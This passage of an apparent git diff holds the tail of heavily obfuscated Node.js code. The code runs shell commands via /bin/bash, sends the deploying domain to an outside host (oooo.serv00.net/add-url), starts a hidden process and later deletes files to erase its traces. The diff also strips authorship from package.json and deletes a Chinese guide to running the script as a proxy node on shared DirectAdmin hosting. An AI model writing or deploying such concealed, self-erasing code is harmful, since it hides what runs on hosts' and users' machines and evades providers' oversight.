_0x5128aa(_0xbad9c1,_0x30ec53,_0x514ad0,_0x4c3800){return _0x279f0a(_0xbad9c1,_0x30ec53-0x72,_0x4c3800-_0x46fb46._0x474da9,_0x4c3800-_0x46fb46._0x3a1b71);}try{const _0xcbdbc={};_0xcbdbc[_0x3a84f9(_0x2dcd7c._0x1d98a8,_0x2dcd7c._0x479cd9,_0x2dcd7c._0x3137a4,_0x2dcd7c._0x391078)]='/bin/bash',_0x489a2d[_0x5128aa(0x1ee,0x1dd,_0x2dcd7c._0x215cd6,_0x2dcd7c._0x51bf78)](exec,_0x293957,_0xcbdbc,_0x11d704=>{const _0x27f7d0={_0x5417b1:0x112,_0x5126fc:0x1c8,_0x339cd5:0x59};function _0x54b97a(_0xd5f84a,_0x58afdb,_0x418abb,_0x375066){return _0x3a84f9(_0x418abb,_0x375066- -_0x27f7d0._0x5417b1,_0x418abb-_0x27f7d0._0x5126fc,_0x375066-_0x27f7d0._0x339cd5);}function _0xba0cb5(_0xcc8853,_0x6ef7a9,_0x256fa4,_0x3aa42b){return _0x5128aa(_0x3aa42b,_0x6ef7a9-_0x50501c._0x27ce4c,_0x256fa4-0x1ef,_0x256fa4- -_0x50501c._0x171b84);}if(_0x11d704)console[_0x54b97a(0x502,_0x1e4687._0x155eac,_0x1e4687._0x21086c,0x470)](_0x489a2d['gTmZv'],_0x11d704);else console[_0x54b97a(_0x1e4687._0x5d3339,_0x1e4687._0xc53cc6,_0x1e4687._0x1bfd1a,_0x1e4687._0x17879c)](_0x489a2d['HqTAZ']);});}catch(_0x42acb3){_0x489a2d['iRcUG'](_0x489a2d['RmbmQ'],_0x489a2d[_0x5128aa(_0x2dcd7c._0x21f160,_0x2dcd7c._0x294331,_0x2dcd7c._0xa98415,0x20b)])?_0x1bfcc4+=-0x15f8+0x142b+0x1*0x1cf:console[_0x3a84f9(_0x2dcd7c._0x3da21c,_0x2dcd7c._0x348780,0x5ff,_0x2dcd7c._0x5ad270)](_0x5128aa(0x287,0x2fa,_0x2dcd7c._0x415f7b,_0x2dcd7c._0xa98415)+_0x42acb3);}};async function addAccessTask(){const _0x35bc6f={_0x2ec082:0x2c,_0x34b072:0x61,_0x1ed33d:0x224,_0x2e6ac1:0x14d,_0x213b07:0x1a9,_0x525eb4:0x191,_0x88c6e8:0x3e9,_0x1e61a5:0x39b,_0x248db1:0x441,_0x348a8b:0x454,_0x17d396:0x38d,_0x35b022:0x5,_0x1c8c44:0x2,_0x3b290e:0x3f3,_0x19c738:0x3e8,_0xc94285:0x145,_0xd391e2:0x11a,_0x207b5e:0x139,_0x417a74:0xb2,_0x4a4bfe:0x38,_0x3092ec:0xaf,_0x4da5dc:0x92,_0x43832e:0x4ab,_0x337a56:0x4d2,_0x5010:0x444},_0x104a45={_0xb442ac:0x17c,_0x3328c1:0x21b,_0x46d178:0x134},_0x57ca06={_0x3ee2de:0x16d,_0x390585:0x57b},_0x12af5d={'INacV':function(_0x5642c8){return _0x5642c8();},'snwrD':function(_0x29e59e,_0x34dbe6){return _0x29e59e===_0x34dbe6;},'OpnUt':_0x5dbc18(-_0x35bc6f._0x2ec082,0x9b,_0x35bc6f._0x34b072,0x7b),'YkzOz':'https://oooo.serv00.net/add-url','sysgO':'application/json','JCSIx':_0x5dbc18(_0x35bc6f._0x1ed33d,_0x35bc6f._0x2e6ac1,_0x35bc6f._0x213b07,_0x35bc6f._0x525eb4)};function _0x4a2b99(_0x40ce0a,_0x32d985,_0x81b45b,_0x1e145a){return _0x421fd5(_0x40ce0a-_0x57ca06._0x3ee2de,_0x40ce0a,_0x81b45b-_0x57ca06._0x390585,_0x1e145a-0x18d);}if(!AUTO_ACCESS)return;if(!DOMAIN)return;const _0x1ced68=_0x4a2b99(0x389,_0x35bc6f._0x88c6e8,_0x35bc6f._0x1e61a5,_0x35bc6f._0x248db1)+DOMAIN;function _0x5dbc18(_0x507d11,_0x1315e1,_0x46addc,_0x33fc82){return _0x421fd5(_0x507d11-_0x104a45._0xb442ac,_0x1315e1,_0x33fc82-_0x104a45._0x3328c1,_0x33fc82-_0x104a45._0x46d178);}try{if(_0x12af5d[_0x4a2b99(_0x35bc6f._0x348a8b,_0x35bc6f._0x17d396,0x423,0x4d1)](_0x12af5d[_0x5dbc18(0xac,_0x35bc6f._0x35b022,_0x35bc6f._0x1c8c44,0xa4)],'cWjOe')){if(_0x51d8d3)_0xdffc03(_0x3e5104);_0x12af5d[_0x4a2b99(_0x35bc6f._0x3b290e,0x3e5,_0x35bc6f._0x19c738,_0x35bc6f._0x19c738)](_0x3679bd);}else{const _0x40ae8f={};_0x40ae8f[_0x5dbc18(_0x35bc6f._0xc94285,_0x35bc6f._0xd391e2,_0x35bc6f._0x207b5e,_0x35bc6f._0x417a74)]=_0x1ced68;const _0x1b523c=await axios[_0x5dbc18(_0x35bc6f._0x4a4bfe,_0x35bc6f._0x3092ec,0x31,_0x35bc6f._0x4da5dc)](_0x12af5d['YkzOz'],_0x40ae8f,{'headers':{'Content-Type':_0x12af5d['sysgO']}});console[_0x4a2b99(_0x35bc6f._0x43832e,_0x35bc6f._0x337a56,_0x35bc6f._0x5010,0x4d7)](_0x12af5d['JCSIx']);}}catch(_0x52f2f0){}}const delFiles=()=>{const _0x419007={_0x6c3cb3:0x55c,_0x444d82:0x50b,_0x5c67fc:0x5f1,_0x4394ee:0x61d,_0x33f470:0x1ea,_0x34a0e6:0x1c5,_0x3dabe3:0x168,_0x2d1f14:0x502,_0x497117:0x592,_0xe4ac10:0x56e},_0x353ac9={_0x4657cf:0x43,_0xace1cd:0x6e1,_0x3b2d04:0x3f},_0x166ca9={_0x4b2545:0x11b,_0x27093e:0x4c},_0x582420={};_0x582420['wlPEn']='npm';function _0x194a38(_0x40bfcd,_0x461143,_0x3c2b0f,_0x555212){return _0x279f0a(_0x40bfcd,_0x461143-_0x166ca9._0x4b2545,_0x555212-0x1d,_0x555212-_0x166ca9._0x27093e);}const _0x3a3159=_0x582420;fs[_0x4f7345(0x5b7,0x4ad,_0x419007._0x6c3cb3,_0x419007._0x444d82)](_0x3a3159[_0x4f7345(0x60d,0x5a8,_0x419007._0x5c67fc,_0x419007._0x4394ee)],()=>{});function _0x4f7345(_0x593e78,_0x1e3eb8,_0x281901,_0x160cd2){return _0x279f0a(_0x593e78,_0x1e3eb8-_0x353ac9._0x4657cf,_0x281901-_0x353ac9._0xace1cd,_0x160cd2-_0x353ac9._0x3b2d04);}fs[_0x194a38(-0x162,-_0x419007._0x33f470,-_0x419007._0x34a0e6,-_0x419007._0x3dabe3)](_0x4f7345(0x638,_0x419007._0x2d1f14,_0x419007._0x497117,_0x419007._0xe4ac10),()=>{});};httpServer[_0x279f0a(-0x151,-0x22c,-0x1c8,-0x11d)](PORT,()=>{const _0x5576c5={_0x53378f:0x21e,_0x45ff6f:0x23e,_0x758512:0x1f4,_0x1b3c7e:0x2a6,_0x4009f4:0x248,_0x2673f9:0x2bf,_0x1e739f:0x1e8,_0x651e39:0x2ee},_0x4234ce={_0x44a084:0x188,_0xf5ee79:0x32b,_0x515479:0x1c4},_0x36a52c={_0x5cdf2e:0x155,_0x1701f4:0x29,_0x414990:0x71},_0x4727ba={'fkxbj':function(_0x57a0e7){return _0x57a0e7();}};_0x4727ba[_0x4447df(-_0x5576c5._0x53378f,-_0x5576c5._0x45ff6f,-0x212,-0x251)](runnz);function _0x4447df(_0x35ca4e,_0x48ec0c,_0x2ae560,_0x1d28d3){return _0x421fd5(_0x35ca4e-_0x36a52c._0x5cdf2e,_0x48ec0c,_0x2ae560- -_0x36a52c._0x1701f4,_0x1d28d3-_0x36a52c._0x414990);}setTimeout(()=>{delFiles();},-0x403e9+-0x2cc9*-0x1f+0x156b2);function _0x4ca947(_0x245abc,_0x144dd9,_0x4bf186,_0x2c1a40){return _0x421fd5(_0x245abc-_0x4234ce._0x44a084,_0x144dd9,_0x245abc-_0x4234ce._0xf5ee79,_0x2c1a40-_0x4234ce._0x515479);}addAccessTask(),console[_0x4ca947(_0x5576c5._0x758512,0x297,0x1a9,_0x5576c5._0x1b3c7e)](_0x4ca947(_0x5576c5._0x4009f4,_0x5576c5._0x2673f9,_0x5576c5._0x1e739f,_0x5576c5._0x651e39)+PORT);}); diff --git a/package.json b/package.json index 1228107be7..2e1e04cf5c 100644 --- a/package.json +++ b/package.json @@ -1,18 +1,15 @@ { - "name": "node-ws", + "name": "nodews", "version": "1.0.0", - "description": "Node.js Server", + "description": "Nodejs-server", "main": "index.js", - "author": "eoovve", - "repository": "https://github.com/eoovve/node-ws", - "license": "MIT", "private": false, "scripts": { "start": "node index.js" }, "dependencies": { "ws": "^8.14.2", - "axios": "^1.6.2" + "axios": "^1.12.2" }, "engines": { "node": ">=14" diff --git a/web-hosting.md b/web-hosting.md deleted file mode 100644 index 030ce5726b..0000000000 --- a/web-hosting.md +++ /dev/null @@ -1,42 +0,0 @@ -## Web Hosting 部署指南(适用于所有带nodejs App功能DirectAdmin面板) - -## 部署流程 - -**1:登录DirectAdmin面板,设置域名,如果已经设置为自己的子域名可以忽略这一步,点击`Account Manager`——`Domain Step`——`RENAME DOMAIN`——选择旧域名,输入一个新的子域名SAVE保存,参考如图:** -![image](https://github.com/user-attachments/assets/823bbe4a-5343-4322-9c1b-a1f80c97f9ed) - -![image](https://github.com/user-attachments/assets/e400548f-225f-4716-8973-35ee8aa68986) - - -**2:设置好域名后,查看域名需要解析到的IP,点击DNS Management查看,打开cloudflared,找到上一步添加的子域名所属的主域名添加A记录,并打开小黄云** -![image](https://github.com/user-attachments/assets/be3a1c29-50b2-41f7-af76-07c170cafc7d) - -![image](https://github.com/user-attachments/assets/4862226b-a053-458c-a842-7da80da14a66) - - -**3:解析完之后回到面板,找到File Manager进入,打开 `domains/你的域名/public_html` 目录,鼠标右键选择Upload Files 上传此项目里的`index.js`和`package.json`** -![image](https://github.com/user-attachments/assets/fdeaa875-739d-42e9-b6fc-e50005446a1f) - - -**4:设置index.js权限为777,并修改index.js里的必要环境变量,DOMAIN为必填,AUTO_ACCESS可设置为true开启自动保活,其他哪吒等参数可选** -![image](https://github.com/user-attachments/assets/5b2cd552-9dc4-4537-a899-967472d83ef2) - -![image](https://github.com/user-attachments/assets/4096918b-46e2-4745-b525-55e5c12d6773) - - -**5:复制地址栏的路径(不要带第一个斜杠)格式:`domains/你的域名/public_html` 再点击左上角的图标回到面板首页** - -**6:找到Setup Nodejs APP,点击进去,接着点击 CREATE APPLICATION,选择`推荐的nodejs版本`以及`Production` -Application root为上一步复制的路径,Application URL留空,Application startup file为 `index.js` 点击右上角的CREATE** -![image](https://github.com/user-attachments/assets/6df13972-a213-4bd5-a055-821fcd34e340) - - -**7:创建完后如下图成功所示后,点击RUN NPM install 按钮 等待30秒** -![image](https://github.com/user-attachments/assets/c094064e-6433-49a8-bd15-43c060d6752e) - -![image](https://github.com/user-attachments/assets/623d3888-e96c-498d-ac9a-84cacca4fea0) - - -**8:返回创建Nodejs App首页,点击重启,然后即可访问 域名/${SUB_PATH} 获取节点, 如果没有修改${SUB_PATH}变量,则默认订阅连接为 https://域名/sub** -![image](https://github.com/user-attachments/assets/3aac69a1-3ec3-4909-872f-fd4e1032012e) -